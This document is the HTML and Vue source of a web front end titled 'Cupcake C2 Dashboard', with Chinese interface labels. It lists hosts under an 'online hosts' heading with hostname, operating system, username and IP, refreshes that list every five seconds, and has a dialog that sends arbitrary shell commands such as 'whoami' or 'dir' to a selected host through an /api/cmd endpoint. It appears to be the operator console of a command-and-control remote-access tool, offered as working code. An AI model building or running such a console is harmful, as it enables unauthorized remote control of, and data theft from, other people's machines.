<!DOCTYPE html>
<html lang="zh-CN">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Cupcake C2 Dashboard</title>
    <!-- 引入样式 -->
    <link rel="stylesheet" href="https://unpkg.com/element-plus/dist/index.css" />
    <style>
        body {
            margin: 0;
            font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif;
            background-color: #f5f7fa;
        }

        .header {
            background-color: #2b3a4a;
            color: #fff;
            display: flex;
            align-items: center;
            justify-content: space-between;
            padding: 0 20px;
            height: 60px;
            box-shadow: 0 2px 8px rgba(0, 0, 0, 0.1);
        }

        .logo {
            display: flex;
            align-items: center;
            gap: 10px;
            font-size: 20px;
            font-weight: bold;
        }

        .main-content {
            padding: 20px;
        }

        .card-header {
            display: flex;
            justify-content: space-between;
            align-items: center;
            font-weight: bold;
        }

        .el-table {
            margin-top: 10px;
            border-radius: 8px;
            overflow: hidden;
        }

        .footer-btns {
            display: flex;
            justify-content: flex-end;
            gap: 10px;
            margin-top: 20px;
        }
    </style>
</head>

<body>
    <div id="app">
        <el-container>
            <el-header class="header">
                <div class="logo">
                    <span>Cupcake C2 Dashboard</span>
                </div>
                <div class="status">
                    <el-tag type="success" effect="dark">Server: {{ serverStatus }}</el-tag>
                </div>
            </el-header>

            <el-main class="main-content">
                <el-card>
                    <template #header>
                        <div class="card-header">
                            <span>在线主机列表 (Online Hosts)</span>
                            <el-button type="primary" size="small" @click="fetchClients"
                                :loading="loading">手动刷新</el-button>
                        </div>
                    </template>

                    <el-table :data="clients" style="width: 100%" border stripe highlight-current-row
                        v-loading="loading">
                        <el-table-column prop="uuid" label="UUID" width="180"></el-table-column>
                        <el-table-column prop="hostname" label="主机名" width="150"></el-table-column>
                        <el-table-column prop="os" label="操作系统" width="120">
                            <template #default="scope">
                                <el-tag :type="scope.row.os.toLowerCase().includes('win') ? '' : 'warning'">{{
                                    scope.row.os }}</el-tag>
                            </template>
                        </el-table-column>
                        <el-table-column prop="username" label="用户名" width="120"></el-table-column>
                        <el-table-column prop="ip" label="客户端 IP" width="140"></el-table-column>
                        <el-table-column label="操作" align="center">
                            <template #default="scope">
                                <el-button type="danger" size="small" @click="openCmdDialog(scope.row)">执行命令</el-button>
                            </template>
                        </el-table-column>
                    </el-table>
                </el-card>
            </el-main>
        </el-container>

        <!-- 命令执行对话框 -->
        <el-dialog v-model="dialogVisible" :title="'下发指令 - ' + (selectedClient ? selectedClient.hostname : '')"
            width="500px">
            <el-form label-position="top">
                <el-form-item label="Shell 指令">
                    <el-input v-model="cmdInput" type="textarea" :rows="4"
                        placeholder="例如: whoami, ls -la, dir"></el-input>
                </el-form-item>
            </el-form>
            <template #footer>
                <div class="footer-btns">
                    <el-button @click="dialogVisible = false">取消</el-button>
                    <el-button type="primary" @click="submitCommand" :loading="submitting">发送指令</el-button>
                </div>
            </template>
        </el-dialog>
    </div>

    <!-- 引入 Vue 和 Element Plus JS -->
    <script src="https://unpkg.com/vue@3/dist/vue.global.js"></script>
    <script src="https://unpkg.com/element-plus"></script>
    <script src="https://unpkg.com/axios/dist/axios.min.js"></script>

    <script>
        const { createApp, ref, onMounted, onUnmounted } = Vue;

        createApp({
            setup() {
                const clients = ref([]);
                const loading = ref(false);
                const dialogVisible = ref(false);
                const selectedClient = ref(null);
                const cmdInput = ref('');
                const submitting = ref(false);
                const serverStatus = ref('8080');

                const API_BASE = '/api';

                const fetchClients = async () => {
                    loading.value = true;
                    try {
                        const res = await axios.get(`${API_BASE}/clients`);
                        clients.value = res.data;
                    } catch (err) {
                        ElementPlus.ElMessage.error('无法获取客户端列表，请检查服务端状态');
                    } finally {
                        loading.value = false;
                    }
                };

                const openCmdDialog = (row) => {
                    selectedClient.value = row;
                    cmdInput.value = '';
                    dialogVisible.value = true;
                };

                const submitCommand = async () => {
                    if (!cmdInput.value.trim()) return ElementPlus.ElMessage.warning('内容不能为空');
                    submitting.value = true;
                    try {
                        const res = await axios.post(`${API_BASE}/cmd`, {
                            uuid: selectedClient.value.uuid,
                            cmd: cmdInput.value
                        });
                        if (res.data.status === 'success') {
                            ElementPlus.ElMessage.success('指令已下发');
                            dialogVisible.value = false;
                        }
                    } catch (err) {
                        ElementPlus.ElMessage.error('指令下发失败: ' + (err.response?.data?.error || err.message));
                    } finally {
                        submitting.value = false;
                    }
                };

                let timer = null;
                onMounted(() => {
                    fetchClients();
                    timer = setInterval(fetchClients, 5000);
                });

                onUnmounted(() => {
                    if (timer) clearInterval(timer);
                });

                return {
                    clients, loading, dialogVisible, selectedClient,
                    cmdInput, submitting, serverStatus,
                    fetchClients, openCmdDialog, submitCommand
                };
            }
        }).use(ElementPlus).mount('#app');
    </script>
</body>

</html>